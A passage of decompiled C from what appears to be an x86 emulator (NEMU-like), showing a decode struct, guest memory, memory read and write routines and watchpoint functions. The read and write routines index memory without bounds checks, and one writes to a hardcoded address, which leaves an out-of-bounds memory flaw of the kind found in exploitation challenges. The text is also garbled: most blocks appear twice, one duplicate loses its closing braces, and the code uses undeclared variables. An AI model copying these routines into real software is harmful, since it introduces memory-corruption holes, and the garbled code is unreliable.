"snprintf(decoding.assembly, 80, \"mov\" \"%c %s,%s\", (((&decoding.dest)->width) == 4 ? 'l' : (((&decoding.dest)"

"->width) == 1 ? 'b' : (((&decoding.dest)->width) == 2 ? 'w' : '?'))), (&decoding.src)->str, (&decoding.dest)->str) < 80"

,

"src/cpu/exec/data-mov.c",

5u,

"exec_mov");

}

typedef struct {

  uint32_t opcode;

  vaddr_t seq_eip;  // sequential eip

  bool is_operand_size_16;

  uint8_t ext_opcode;

  bool is_jmp;

  vaddr_t jmp_eip;

  Operand src, dest, src2;
#ifdef DEBUG

  char assembly[80];

  char asm_buf[128];

  char *p;
#endif
} DecodeInfo;

typedef struct {

uint32_t opcode;

vaddr_t seq_eip; // sequential eip

bool is_operand_size_16;

uint8_t ext_opcode;

bool is_jmp;

vaddr_t jmp_eip;

Operand src, dest, src2;

#ifdef DEBUG

char assembly[80];

char asm_buf[128];

char *p;

#endif

} DecodeInfo;

#define PMEM_SIZE (128 * 1024 * 1024)

uint8_t pmem[PMEM_SIZE] = {0};

#define PMEM_SIZE (128 * 1024 * 1024)

uint8_t pmem[PMEM_SIZE] = {0};

uint32_t __fastcall vaddr_read(vaddr_t addr, int len)
{

  return *&pmem[addr] & (0xFFFFFFFF >> (8 * (4 - len)));//len==4
}

uint32_t __fastcall vaddr_read(vaddr_t addr, int len)

{

return *&pmem[addr] & (0xFFFFFFFF >> (8 * (4 - len)));//len==4

}

void __fastcall vaddr_write(vaddr_t addr, int len, uint32_t data)
{

  uint32_t dataa; // [rsp+4h] [rbp-14h] BYREF

  unsigned __int64 v4; // [rsp+8h] [rbp-10h]
 
  dataa = data;

  v4 = __readfsqword(0x28u);

  memcpy((addr + 0x6A3B80LL), &dataa, len);
}

void __fastcall vaddr_write(vaddr_t addr, int len, uint32_t data)

{

uint32_t dataa; // [rsp+4h] [rbp-14h] BYREF

unsigned __int64 v4; // [rsp+8h] [rbp-10h]

dataa = data;

v4 = __readfsqword(0x28u);

memcpy((addr + 0x6A3B80LL), &dataa, len);

}

void __fastcall set_watchpoint(char *args)
{

  if ( flag )

  {

    v2 = free_;

    v3 = free_->next;

    free_->old_val = v1;

    v2->next = 0LL;

    free_ = v3;

    *v2->exp = *args;

    *&v2->exp[8] = *(args + 1);

    *&v2->exp[16] = *(args + 2);

    *&v2->exp[24] = *(args + 6);

    *&v2->exp[28] = *(args + 14);

    v4 = head;

    if ( head )

    {

      while ( v4->next )

        v4 = v4->next;

      v2->NO = v4->NO + 1;

      v4->next = v2;

    }

    else

    {

      v2->NO = 1;

      head = v2;

    }

  }
}

void __fastcall set_watchpoint(char *args)

{

if ( flag )

{

v2 = free_;

v3 = free_->next;

free_->old_val = v1;

v2->next = 0LL;

free_ = v3;

*v2->exp = *args;

*&v2->exp[8] = *(args + 1);

*&v2->exp[16] = *(args + 2);

*&v2->exp[24] = *(args + 6);

*&v2->exp[28] = *(args + 14);

v4 = head;

if ( head )

{

while ( v4->next )

v4 = v4->next;

v2->NO = v4->NO + 1;

v4->next = v2;

}

else

{

v2->NO = 1;

head = v2;

}

void __cdecl init_wp_pool()
{

  __int64 v0; // rax

  int i; // edx
 
  v0 = 141180952LL;

  for ( i = 0; i != 32; ++i )

  {

    *(v0 - 56) = i;

    *(v0 - 48) = v0;

    v0 += 56LL;

  }

  wp_pool[31].next = 0LL;

  head = 0LL;

  free_ = wp_pool;
}